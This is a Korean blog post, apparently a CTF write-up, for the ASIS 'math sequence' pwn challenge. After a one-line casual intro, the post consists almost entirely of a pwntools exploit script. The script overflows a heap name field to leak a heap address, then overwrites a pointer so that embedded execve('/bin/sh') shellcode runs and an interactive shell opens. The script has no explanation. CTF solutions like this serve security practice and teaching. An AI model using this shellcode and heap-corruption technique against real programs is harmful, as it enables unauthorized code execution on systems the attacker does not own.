728x90

요즘 알고리즘을 공부하느라 해킹 공부를 소홀히 했다 ㅠㅠ 그래서 간만에 풀어본 asis math sequence!! 재밌다 ㅎㅎ


from pwn import *

s = process("./mathseq")

elf = ELF("./mathseq")
shell = "\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"
libc = ELF("./libc")

def create(name,size,content):
s.recvuntil("? ")
s.sendline("1")
    s.recvuntil("Please enter the sequence name: ")
    s.send(name)
    s.recvuntil("Please enter the sequence size: ")
    s.sendline(str(size))
    s.recvuntil("Please enter the sequence : ")
    s.send(content)

def edit(index,yes_or_no,name,content):
s.recvuntil("? ")
s.sendline("2")
    s.recvuntil("? ")
    s.sendline(str(index))
    s.recvuntil("Is it valid(y/n)? ")
    s.sendline(yes_or_no)
    if yes_or_no == "n":
        s.recvuntil("Please enter the new sequence name: ")
        s.send(name)
        s.recvuntil("Please enter the new sequence : ")
        s.send(content)

def dell(index):
s.recvuntil("? ")
s.sendline("3")
    s.recvuntil("? ")
    s.sendline(str(index))


def prints():
s.recvuntil("? ")
s.sendline("4")


def quit():
    s.recvuntil("? ")
    s.sendline("5")

create("A"*8,32,"1"*8)
create("B"*8,32,"2"*8)
create("C"*8,32,shell)

pay = "K"*102
pay += "h"*(3*8)

edit(2,"n",pay,"2"*8)

prints()

s.recvuntil("h"*24)
heap = u64(s.recv(4)+"\x00"*4)
heap = heap - 0x1190
print "heap : " + hex(heap)
shell_addr = heap + 0x1260
print "shell : " + hex(shell_addr)

edit(1,"n","A"*0x7e+"\xe0","2"*8+p64(0xa1)+p64(shell_addr))

prints()

s.interactive()


'PWN > CTF' 카테고리의 다른 글

[Hackingcamp 19] Orange  (0) 2019.02.20
[Hackingcamp 19] sms_service  (0) 2019.02.20
[Asis 2016] b00ks  (0) 2019.02.06
[Codegate 2019] got-the-reum  (0) 2019.02.05
[codegate 2018] marimo  (0) 2019.01.24